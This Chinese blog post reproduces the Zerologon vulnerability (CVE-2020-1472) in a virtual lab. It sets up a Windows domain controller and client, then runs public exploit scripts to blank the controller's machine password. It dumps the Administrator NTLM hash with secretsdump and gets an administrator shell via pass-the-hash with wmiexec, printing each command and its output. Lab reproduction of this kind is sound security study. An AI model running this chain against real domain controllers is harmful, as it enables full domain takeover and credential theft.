PJzhang:CVE-2020-1472微软NetLogon权限提升漏洞~复现

微信扫一扫,分享到朋友圈

PJzhang:CVE-2020-1472微软NetLogon权限提升漏洞~复现

猫宁~~~

虚拟机上进行

安装windows 2008 R2

查看服务器ip

本地连接属性,取消ipv6,ip设置为192.168.43.158,子网掩码255.255.255.0,网关192.168.43.1,DNS设置192.168.43.1

打开初始配置任务,添加服务器角色,选择active directory域服务

dcpromo,开启active directory域服务安装向导,新林中新建域,输入域名www.pjzhang.com,密码设置123.aaa,重启计算机

安装windows 7

本地连接属性,取消ipv6,ip设置为192.168.43.241,子网掩码255.255.255.0,网关192.168.43.1,DNS设置192.168.43.158

计算机属性,更改设置,计算机名更改,隶属于域中填写www.pjzhang.com,账号密码administrator/123.aaa,重启计算机

https://github.com/SecuraBV/CVE-2020-1472

git clone https://github.com/SecuraBV/CVE-2020-1472.git

kali linux攻击机

apt-get install python3-pip

pip3 install -r requirements.txt

计算机属性查看windows 2008 r2的计算机名

python3 zerologon_tester.py WIN-U2A9B1M49R3 192.168.43.158

显示Success! DC can be fully compromised by a Zerologon attack.

https://github.com/dirkjanm/CVE-2020-1472

git clone https://github.com/dirkjanm/CVE-2020-1472.git

python3 cve-2020-1472-exploit.py WIN-U2A9B1M49R3 192.168.43.158

报错

Unexpected error: module ‘impacket.dcerpc.v5.nrpc’ has no attribute ‘NetrServerPasswordSet2’.

git clone https://github.com/SecureAuthCorp/impacketcd

cd impacket/

pip3 install . 点代表目录

python3 cve-2020-1472-exploit.py WIN-U2A9B1M49R3 192.168.43.158

显示Exploit complete!,域控密码修改为空

cd impacket/examples

python3 secretsdump.py WIN-U2A9B1M49R3\$@192.168.43.158 -no-pass

注意上方的反斜杠

获得Administrator:500:aad3b435b51404eeaad3b435b51404ee:28553a7f5b14b5e60ba4d7cce9045e3d:::

cd impacket/examples

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:28553a7f5b14b5e60ba4d7cce9045e3d Administrator@192.168.43.158

连接上域控C:\>

显示

C:\>whoami

www\administrator

微信扫一扫,分享到朋友圈

PJzhang:CVE-2020-1472微软NetLogon权限提升漏洞~复现

无缘上映的国产片,只因内容太戳心

上一篇

你也可能喜欢

PJzhang:CVE-2020-1472微软NetLogon权限提升漏洞~复现

长按储存图像,分享给朋友